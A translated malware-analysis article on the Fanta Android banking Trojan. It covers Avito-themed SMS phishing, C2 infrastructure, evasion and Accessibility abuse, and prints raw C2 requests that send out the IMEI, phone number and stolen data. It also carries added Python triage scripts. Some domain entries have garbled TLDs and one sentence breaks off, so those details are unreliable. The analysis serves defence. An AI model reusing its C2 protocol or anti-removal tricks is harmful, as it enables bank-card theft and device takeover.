Flow, Fanta: a new tactic of an old Android Trojan


One day you decide to sell something on Avito, and shortly after posting a detailed description of your item (say, a RAM module) you receive the following message:

[Figure: the SMS message received by the seller]

When you open the link, you see a seemingly harmless page informing you, the happy and lucky seller, that your item has been purchased:

[Figure: phishing page announcing the "sale"]
When you tap the "Continue" button, an APK file with a trustworthy icon and name is downloaded to your Android device. You install an application that, for some reason, asks for Accessibility Service rights; a couple of windows then appear and quickly disappear... And that is it.

You go to check your balance, but for some reason your banking app asks for your card details again. After you enter them, something very bad happens: for reasons you still do not understand, money starts leaving your account. You try to deal with the problem, but your phone fights back: it presses the Back and Home keys on its own, will not turn off and will not let you enable any security measure. As a result you are left without money, your item has not been bought, and you are confused and wondering: what just happened?

The answer is simple: you have become a victim of the Fanta Android Trojan, a member of the Flexnet family. How did it happen? Let us explain.

Authors: Andrey Polovinkin, Junior Malware Analyst; Ivan Pisarev, Malware Analyst.

Some statistics

The Flexnet family of Android Trojans was first reported in 2015. Over its long period of activity the family has branched into several variants: Fanta, Limebot, Lipton and others. Neither the Trojan nor the infrastructure behind it stands still: new and effective distribution schemes are being developed (in our case, high-quality phishing pages tailored to a specific seller), and the Trojan's developers follow the fashions of virus writing, adding new functionality that lets them steal money from infected devices more efficiently and bypass protection mechanisms.

The campaign described in this article targets users in Russia; a small number of infected devices were recorded in Ukraine, and even fewer in Kazakhstan and Belarus.

Although Flexnet has been in the Android Trojan arena for more than 4 years and has been studied in detail by many researchers, it is still in good shape. As of January 2019 the potential damage exceeds 35 million rubles, and that is for the Russian campaigns alone. Back in 2015, various versions of this Android Trojan were sold on underground forums, where the Trojan's source code with a detailed description could also be found. This means the worldwide damage figures are even more impressive. Not bad for such an old-timer, is it?


From sale to fraud

As the screenshot of the phishing page imitating the Avito classifieds service shows, the page was prepared for a specific victim. The attackers apparently use one of the Avito parsers to pull the seller's phone number and name as well as the item description. After deploying the page and preparing the APK file, the victim is sent an SMS message containing their name and a link to the phishing page, which carries the description of their item and the amount received from its "sale". Tapping the button delivers the malicious APK file, Fanta, to the user.

A study of the shcet491[.]ru domain showed that it is delegated to Hostinger's DNS servers:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

The domain's zone file contains records pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243 and 31.220.23[.]235. However, the domain's main resource record (the A record) points to a server with the IP address 178.132.1[.]240.

The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the hoster WorldStream. The IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[ The registrar used is openprov-ru. The following domains also resolved to the IP address 178.132.1[.]240:

  • sdelka-ru[.]ru
  • product-av[.]ru
  • av-product[.]ru
  • heshiis[.] en
  • shcet382[.]ru
  • sdelka221[.] en
  • sdelka211[.] en
  • vyplata437[.] ru
  • viplata291[.] en
  • Translation273[.] en
  • Translation901[.] en

It should be noted that a link of the following format was found in almost all cases:

http://(www.){0,1}<%domain%>/[0-9]{7}

The links in the SMS messages follow this pattern as well. According to historical data, several links matching the pattern above correspond to a single domain, which indicates that one domain is used to distribute the Trojan to several victims.
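The link format above is easy to turn into a triage check for SMS exports or an SMS gateway log. The following Python is an added example, not code from the article or from Group-IB: it compiles the article's pattern against the distribution domains whose TLD is unambiguous on the page, and the sample messages, names and seven-digit ids are constructed for the demonstration.

```python
import re

# Distribution domains listed in the article, in the defanged form used there.
# Only entries whose TLD is unambiguous on the page are included.
FANTA_DOMAINS = [
    "shcet491[.]ru",
    "sdelka-ru[.]ru",
    "product-av[.]ru",
    "av-product[.]ru",
    "shcet382[.]ru",
]


def refang(domain: str) -> str:
    """Turn the defanged 'host[.]tld' notation back into a real hostname."""
    return domain.replace("[.]", ".")


def build_link_pattern(domains):
    """Compile the article's link format, http://(www.){0,1}<%domain%>/[0-9]{7},
    restricted to the given domains. The negative lookahead keeps an 8-digit
    path or a longer path (e.g. /1234567/x) from matching."""
    alternatives = "|".join(re.escape(refang(d)) for d in domains)
    return re.compile(
        r"https?://(?:www\.)?(" + alternatives + r")/([0-9]{7})(?![0-9A-Za-z/])",
        re.IGNORECASE,
    )


def find_fanta_links(text, domains=FANTA_DOMAINS):
    """Return (hostname, seven-digit id) for every matching link in `text`."""
    pattern = build_link_pattern(domains)
    return [(m.group(1).lower(), m.group(2)) for m in pattern.finditer(text)]


def triage_sms(messages, domains=FANTA_DOMAINS):
    """Scan a batch of SMS bodies and report which ones carry a matching link."""
    hits = []
    for index, body in enumerate(messages):
        for host, link_id in find_fanta_links(body, domains):
            hits.append({"message": index, "host": host, "id": link_id})
    return hits


# Constructed sample messages; the names, order ids and amounts are invented.
SAMPLE_SMS = [
    "Ivan, your item has been bought. Details: http://www.shcet491.ru/4821733",
    "Your order is on its way, track it at https://www.avito.ru/order/4821733",
    "Payout ready: http://shcet382.ru/48217339",   # eight digits: not the pattern
    "Meeting moved to 15:00",
]

if __name__ == "__main__":
    for hit in triage_sms(SAMPLE_SMS):
        print(f"message #{hit['message']}: {hit['host']} id {hit['id']}")
```

The seven-digit id is captured separately because, as the article notes, several ids map to one domain; grouping hits by host and id shows how many victims a single distribution domain served.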

Let us jump ahead a little: the Trojan downloaded from the SMS link uses onuseseddohap[.]club as its control server. The domain was registered on 2019-03-12, and APK applications have been communicating with it since 2019-04-29. Based on VirusTotal data, a total of 109 applications communicated with this server. The domain itself resolves to the IP address 217.23.14[.]27, located in the Netherlands and belonging to the hoster WorldStream. The registrar used is namecheap. The domains bad-racoon[.]club (since 2018-09-25) and bad-racoon[.]live (since 2018-10-25) also resolved to this IP address. More than 80 APK files communicated with bad-racoon[.]club, and more than 100 with bad-racoon[.]live.

Overall, the attack scheme looks as follows.

[Figure: general attack scheme]

What does Fanta have under the hood?

Like many other Android Trojans, Fanta can read and send SMS messages, make USSD requests and display its own windows on top of other applications (banking apps included). The family's arsenal has grown, however: Fanta now uses the Accessibility Service for several purposes, such as reading the contents of other applications' notifications and preventing the Trojan from being detected and terminated on the infected device. Fanta runs on all Android versions above 4.4. In this article we take a closer look at the following Fanta sample:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Immediately after launch

Immediately after launch the Trojan hides its icon. The application only runs if the name of the infected device is not in the following list:

  • android_x86
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (hammerhead)

This check is performed in the Trojan's main service. During the first launch the application's configuration parameters are initialised with default values (the storage format of the configuration data and the meaning of each value are discussed later), and the newly infected device is registered with the control server. An HTTP POST request with the message type register_bot and information about the infected device (Android version, IMEI, phone number, operator name and the code of the country in which the operator is registered) is sent to the server. The address hXXp://onuseseddohap[.]club/controller.php is used as the control server. In response, the server sends a message containing the fields bot_id, bot_pwd and server; these values are saved by the application as the CnC server parameters. The server parameter is optional: if the field is absent, Fanta uses the registration address hXXp://onuseseddohap[.]club/controller.php. The ability to change the CnC address solves two problems: spreading the load evenly across several servers (with a large number of infected devices, the load on an unoptimised web server can be high) and switching to a backup server if one of the CnC servers fails.

If an error occurs while sending the request, the Trojan repeats the registration procedure after 20 seconds.

After the device has been registered successfully, Fanta shows the user the following message:

[Figure: message shown by Fanta after registration]

An important note: the service called System Security is the Trojan's own service, and after the user taps OK a window with the infected device's Accessibility settings opens, where the user personally grants accessibility rights to the malicious service:

[Figure: Accessibility settings window]

Once the user enables the Accessibility Service, Fanta gains access to the contents of application windows and to the actions performed in them:

[Figure: the Accessibility Service enabled for the Trojan]

Immediately after obtaining Accessibility rights, the Trojan requests device administrator rights and the right to read notifications:

[Figure: device administrator and notification access requests]

Using the Accessibility Service, the application simulates key presses and thereby grants itself all the rights it needs.

Fanta creates several database instances (described later) that are needed to store the configuration data as well as the information about the infected device collected during operation. To send the collected information, the Trojan creates a recurring task that uploads fields from the database and fetches a command from the control server. The CnC polling interval depends on the Android version: on 5.1 it is 10 seconds, otherwise 60 seconds.

To receive a command, Fanta makes a getTask request to the control server. In response, the CnC can send one of the following commands:

Command   Description
0         Send an SMS message
1         Make a phone call or run a USSD command
2         Update the interval parameter
3         Update the intercept parameter
6         Update the smsManager parameter
9         Start collecting SMS messages
11        Reset the phone to factory settings
12        Enable/disable logging of dialog box creation

Fanta also collects notifications from 70 banking, fast-payment and e-wallet applications and stores them in the database.

Storing configuration parameters

To store its configuration parameters, Fanta uses the standard Android mechanism, preferences files. The settings are saved in a file named settings. The saved parameters are described in the table below.

Name         Default value                  Possible values   Description
id           0                              Integer           Bot identifier
server       hXXp://onuseseddohap[.]club/   URL               Control server address
pwd          -                              string            Server password
interval     20                             Integer           Time interval; how long the following tasks are postponed:
                                                                • sending a request about the status of a sent SMS message
                                                                • fetching a new command from the control server
intercept    all                            all/telNumber     If the field equals the string all or telNumber, received SMS messages are intercepted by the application and not shown to the user
smsManager   0                              0/1               Enable/disable the application as the default SMS handler
readDialog   false                          true/false        Enable/disable logging of Accessibility Event events

Fanta also uses the smsManager file:

Name   Default value   Possible values   Description
pckg   -               string            Name of the SMS manager in use

Database interaction

The Trojan uses two databases during operation. A database named a is used to store various information collected from the phone. The second database, named fanta.db, stores the settings that control the creation of the phishing windows used to collect bank card information.

The Trojan uses database a to store the collected information and to log its actions. The data is kept in a table named logs. The following SQL query is used to create the table:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

The database contains the following information:

1. Power-on of the infected device, logged with the message Phone turned on!

2. Application notifications. The message is built according to the following template:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Bank card data from the phishing forms created by the Trojan. The VIEW_NAME parameter can be one of the following:

  • AliExpress
  • Avito
  • Google Play
  • Misc <%App Name%>

The message is written in the format:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Incoming/outgoing SMS messages in the format:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Information about the package that created a dialog box, in the format:

(<%Package name%>)<%Package information%>

Example of the logs table:

[Figure: example rows of the logs table]
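For incident responders who recover database a from a device, the five record formats above are enough to triage the logs table automatically. The following Python is an added example, not code from the article or from Group-IB: it recreates the table with the article's schema in an in-memory SQLite database, fills it with constructed rows (the card number, phone numbers, timestamps and texts are invented), classifies each row by its format, and masks card numbers so that the triage output is not itself card data. The Russian labels in the regexes are the literal strings the Trojan writes; the exact power-on string is assumed to be the article's wording.

```python
import re
import sqlite3

# Schema of the `logs` table in database `a`, as given in the article.
CREATE_LOGS = (
    "create table logs ( _id integer primary key autoincrement,"
    " d TEXT, f TEXT, p TEXT, m integer)"
)

# Record formats from the article, matched verbatim (labels included).
CARD_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\((?P<view>[^)]+)\) Номер карты:(?P<pan>\d+);"
    r" Дата:(?P<mm>\d{1,2})/(?P<yy>\d{2,4}); CVV: ?(?P<cvv>\d{3,4})$"
)
SMS_RE = re.compile(
    r"^\(\[(?P<ts>[^\]]+)\] Тип: (?P<dir>Входящее|Исходящее)\) (?P<num>[^:]+):(?P<text>.*)$"
)
NOTIFICATION_RE = re.compile(r"^\((?P<app>[^)]+)\)(?P<title>[^:]*): (?P<text>.*)$")
DIALOG_RE = re.compile(r"^\((?P<pkg>[^)]+)\)(?P<info>.*)$")
POWER_ON = "Phone turned on!"   # assumed: the article's wording of the power-on record


def mask_pan(pan):
    """Keep the BIN and last four digits only; shorter values are fully masked."""
    if len(pan) <= 10:
        return "*" * len(pan)
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def classify_record(d):
    """Map one `d` value of the logs table to a record kind plus parsed fields."""
    if (m := CARD_RE.match(d)):
        return {"kind": "card", "view": m["view"], "pan": mask_pan(m["pan"]),
                "exp": f"{m['mm']}/{m['yy']}"}
    if (m := SMS_RE.match(d)):
        return {"kind": "sms", "direction": "in" if m["dir"] == "Входящее" else "out",
                "number": m["num"], "text": m["text"]}
    if d == POWER_ON:
        return {"kind": "power_on"}
    if (m := NOTIFICATION_RE.match(d)):
        return {"kind": "notification", "app": m["app"], "title": m["title"],
                "text": m["text"]}
    if (m := DIALOG_RE.match(d)):
        return {"kind": "dialog", "package": m["pkg"], "info": m["info"]}
    return {"kind": "unknown", "raw": d}


def triage_logs(conn):
    """Walk the logs table in insertion order and classify every row."""
    rows = conn.execute("select _id, d, p, m from logs order by _id").fetchall()
    return [dict(classify_record(d), id=_id, p=p, m=m) for _id, d, p, m in rows]


# Constructed sample rows (d, f, p, m); all values are invented.
SAMPLE_ROWS = [
    ("Phone turned on!", "", "", 0),
    ("(Bank App)Transfer: 1 000 RUB received", "", "", 0),
    ("[12:34:56 01.05.2019](Avito) Номер карты:4111111111111111; Дата:12/22; CVV: 123", "", "", 0),
    ("([12:35:10 01.05.2019] Тип: Входящее) +70000000000:Your code is 1234", "", "+70000000000", 1),
    ("(com.example.dialog)Confirmation dialog", "", "", 0),
]


def load_sample_db():
    """Build the in-memory database an analyst would otherwise pull from a device."""
    conn = sqlite3.connect(":memory:")
    conn.execute(CREATE_LOGS)
    conn.executemany("insert into logs (d, f, p, m) values (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


if __name__ == "__main__":
    for record in triage_logs(load_sample_db()):
        print(record)
```

The classification order matters: the card and SMS formats are tried first because both start with a bracket, and the notification format (which requires a ": " separator) is tried before the looser dialog format so that dialog records are not mistaken for notifications.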
One of Fanta's functions is collecting bank card information. The data is gathered by creating phishing windows when banking applications are opened. The Trojan creates each phishing window only once. Information about which window has already been shown to the user is stored in the settings table of the fanta.db database. The following SQL query is used to create the table:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

All fields of the settings table are initialised to 1 (create the phishing window) by default. After the user enters their data, the value is set to 0. The fields of the settings table:

  • can_login - the field controls showing the form when a banking application is opened
  • first_bank - not used
  • can_avito - the field controls showing the form when the Avito application is opened
  • can_ali - the field controls showing the form when the AliExpress application is opened
  • can_another - the field controls showing the form when any application from this list is opened: Yula, Pandao, Drome Auto, Wallet. Discounts and bonus cards, Aviasales, Booking, Trivago
  • can_card - the field controls showing the form when Google Play is opened

Interaction with the control server

Network communication with the control server takes place over HTTP. Fanta uses the popular Retrofit library for networking. Requests are sent to hXXp://onuseseddohap[.]club/controller.php. The server address can be changed during registration with the server. The server may return cookies. Fanta makes the following requests to the server:

  • Bot registration with the control server takes place once, at first launch. The following data about the infected device is sent to the server:
    · cookie - the cookies received from the server (initially an empty string)
    · mode - the constant string register_bot
    · prefix - the constant number 2
    · version_sdk - built according to the template <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - the IMEI of the infected device
    · country - the code of the country in which the operator is registered, in ISO format
    · number - the phone number
    · operator - the operator name

    Example of the request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    In response to the request, the server must return a JSON object containing the following parameters:
    · bot_id - the identifier of the infected device. If bot_id equals 0, Fanta repeats the request.
    · bot_pwd - the server password.
    · server - the control server address. This parameter is optional; if it is not specified, the address stored in the application is used.

    Example JSON object:

    {
        "response":[
       	 {
       		 "bot_id": <%BOT_ID%>,
       		 "bot_pwd": <%BOT_PWD%>,
       		 "server": <%SERVER%>
       	 }
        ],
        "status":"ok"
    }

  • Request for a command from the server. The following data is sent to the server:
    · cookie - the cookies received from the server
    · bid - the identifier of the infected device, received in response to the register_bot request
    · pwd - the server password
    · divice_admin - the field indicates whether administrator rights have been obtained. If they have, the field equals 1, otherwise 0
    · Accessibility - the state of the Accessibility Service. If the service is running, the value is 1, otherwise 0
    · SMSManager - indicates whether the Trojan is enabled as the default SMS application
    · screen - indicates the screen state; the value is set to 1 if the screen is on, otherwise 0

    Example of the request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Depending on the command, the server returns a JSON object with different parameters:

    · Command Send an SMS message. The parameters contain the phone number, the SMS text and the identifier of the message being sent. The identifier is used when sending a message of type setSmsStatus to the server.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Command Make a phone call or run a USSD command: the phone number or command arrives in the response body.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · Command Change the interval.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": <%SECONDS%>
       	 }
        ],
        "status":"ok"
    }

    · Command Change the intercept parameter.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
       	 }
        ],
        "status":"ok"
    }

    · Command Change the SmsManager setting.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Command Collect SMS messages from the infected device.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Command Reset the phone to factory settings:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Command Change the readDialog setting.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • Sending a message of type setSmsStatus. This request is made after the Send an SMS message command has been executed. The request looks like this:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Uploading the contents of the database. One row is transferred per request. The following data is sent to the server:
    · cookie - the cookies received from the server
    · mode - the constant string setSaveInboxSms
    · bid - the identifier of the infected device, received in response to the register_bot request
    · text - the text of the current database record (field d of the logs table in database a)
    · number - the name of the current database record (field p of the logs table in database a)
    · sms_mode - an integer value (field m of the logs table in database a)

    The request looks like this:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Once the row has been delivered to the server successfully, it is deleted from the table. Example JSON object returned by the server:

    {
        "response":[],
        "status":"ok"
    }
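Because every message type above is a plain form-encoded POST to one path with an okhttp user agent, the protocol can be recognised in proxy or sandbox captures without decrypting anything. The following Python is an added example, not code from the article or from Group-IB: it decodes a raw HTTP request into the Fanta message type and its fields, and maps a getTask reply to the command names from the table above. The captured request and reply are constructed after the article's layouts; the IMEI, phone numbers, operator and id values are placeholders.

```python
import json
from urllib.parse import parse_qs

# Request types and getTask command codes from the article.
FANTA_MODES = {"register_bot", "getTask", "setSmsStatus", "setSaveInboxSms"}
TASK_COMMANDS = {
    0: "send SMS message",
    1: "phone call or USSD command",
    2: "update interval",
    3: "update intercept",
    6: "update smsManager",
    9: "collect SMS messages",
    11: "factory reset",
    12: "toggle dialog logging",
}


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (request line, headers dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body.strip()


def classify_request(raw):
    """Return a verdict for one captured request: which Fanta message type it
    is (if any), where it went, and which form fields it carried."""
    request_line, headers, body = parse_http_request(raw)
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    mode = fields.get("mode")
    verdict = {
        "path": request_line.split(" ")[1] if " " in request_line else "",
        "host": headers.get("host", ""),
        "user_agent": headers.get("user-agent", ""),
        "mode": mode,
        "fields": sorted(fields),
        "match": mode in FANTA_MODES and request_line.startswith("POST"),
    }
    # Registration leaks the device identity; list those fields explicitly so
    # the responder knows what left the device.
    if mode == "register_bot":
        verdict["exfiltrated"] = [f for f in ("imei", "number", "operator", "country")
                                  if f in fields]
    return verdict


def classify_tasks(json_text):
    """Decode a getTask reply and name the commands it carries; unknown codes
    are reported rather than silently dropped."""
    reply = json.loads(json_text)
    if reply.get("status") != "ok":
        return []
    names = []
    for task in reply.get("response", []):
        code = task.get("mode")
        names.append(TASK_COMMANDS.get(code, f"unknown mode {code!r}"))
    return names


# Constructed samples modelled on the article's request/response layouts.
# IMEI, numbers, operator and ids are placeholders, not real data.
SAMPLE_REGISTER = (
    "POST /controller.php HTTP/1.1\r\n"
    "Cookie:\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: onuseseddohap.club\r\n"
    "User-Agent: okhttp/3.6.0\r\n"
    "\r\n"
    "mode=register_bot&prefix=2&version_sdk=Nexus+5%2F5.1(Avit)&imei=000000000000000"
    "&country=ru&number=%2B70000000000&operator=OPERATOR"
)
SAMPLE_TASK_REPLY = json.dumps({
    "response": [{"mode": 0, "sms_number": "+70000000001", "sms_text": "test", "sms_id": 7}],
    "status": "ok",
})

if __name__ == "__main__":
    print(classify_request(SAMPLE_REGISTER))
    print(classify_tasks(SAMPLE_TASK_REPLY))
```

Matching on the mode field rather than on the hostname is deliberate: the article shows that the CnC address is changed through the server parameter, so a hostname-only rule would stop firing the moment the operators move.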

Interaction with the Accessibility Service

The Accessibility Service exists to make Android devices easier to use for people with disabilities. Interacting with an application normally requires physical interaction; the Accessibility Service makes it possible to do this programmatically. Fanta uses the service to create fake windows on top of banking applications and to stop system settings screens and certain applications from opening.

Using the Accessibility Service, the Trojan monitors changes to the screen elements of the infected device. As described earlier, Fanta's settings contain a parameter responsible for logging dialog box operations: readDialog. If this parameter is set, the name and description of the package that triggered the event are added to the database. When events fire, the Trojan performs the following actions:

  • It simulates pressing the Back and Home keys in the following cases:
    · the user wants to reboot the device
    · the user wants to uninstall the "Avito" application or change its permissions
    · the "Avito" application is mentioned on the page
    · the "Google Play Protect" app is opened
    · pages with Accessibility Service settings are opened
    · the System Security dialog box appears
    · the "Draw over other apps" settings page is opened
    · the "Applications", "Backup and Reset", "Reset Data", "Reset Settings", "Developer Panel", "Special features", "Accessibility" or "Special permissions" page is opened
    · the event came from one of a specific set of applications.

    List of applications

    • android
    • Master Lite
    • Clean Master
    • Clean Master for x86 CPU
    • Meizu Application Permission Management
    • MIUI Security
    • Clean Master - Antivirus & Cache & Junk Cleaner
    • Parental control and GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & free protection 2019
    • MegaFon Mobile Security
    • AVG Protection for Xperia
    • Mobile Security
    • Malwarebytes antivirus & protection
    • Antivirus for Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • AVG Antivirus for Huawei System Manager tablet
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Speed Booster
    • dr.web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Mobile Security
    • Kaspersky Internet Security: Antivirus and Protection
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - protection and management
    • AVG Antivirus free 2019 - Android protection
    • Android Antivirus
    • Norton Mobile Security and Antivirus
    • Antivirus, firewall, VPN, mobile security
    • Mobile Security: Antivirus, VPN, Anti-theft
    • Antivirus for Android

  • If confirmation is requested when sending an SMS message to a short number, Fanta simulates ticking the Remember choice checkbox and tapping the Send button.
  • When an attempt is made to revoke the Trojan's administrator rights, it locks the phone screen.
  • It prevents new device administrators from being added.
  • If the dr.web antivirus application has detected a threat, it taps Ignore.
  • The Trojan tries to press the Back and Home buttons if the event came from the Samsung Device Care application.
  • Fanta creates phishing windows with forms for entering bank card details if one of roughly 30 online service applications is launched. Among them: AliExpress, Booking, Avito, the Google Play Market component, Pandao, Drome Auto and others.

    Phishing forms

    Fanta analyses the applications running on the infected device. If an application of interest is opened, the Trojan displays a phishing window on top of all others: a form for entering bank card details. The user is asked to enter the following data:

    • Card number
    • Card expiry date
    • CVV
    • Cardholder name (not for all banks)

    Different phishing windows are shown depending on the running application. Here are some examples:

    AliExpress:

    [Figure: AliExpress phishing window]

    Avito:

    [Figure: Avito phishing window]

    Some other applications, such as Google Play Market, Aviasales, Pandao, Booking and Trivago:

    [Figure: phishing window shown for the other applications]

    How it really happened

    Fortunately, the person who received the SMS message described at the beginning of the article turned out to be an information security specialist. So the real, non-dramatised version differs from the one told above: the person received a curious SMS and handed it over to the Group-IB Threat Intelligence team. The outcome of the attack is this article. A happy ending, right? Not all stories end so well, though, and to keep yours from turning into the dramatised version with your money gone, it is usually enough to follow these long-standing rules:

    • do not install apps on your Android device from anywhere other than Google Play
    • when installing an app, pay close attention to the permissions it requests
    • pay attention to the extensions of downloaded files
    • install Android OS updates regularly
    • do not visit suspicious sites and do not download files from them
    • do not tap links received in SMS messages.

Source: www.habr.com
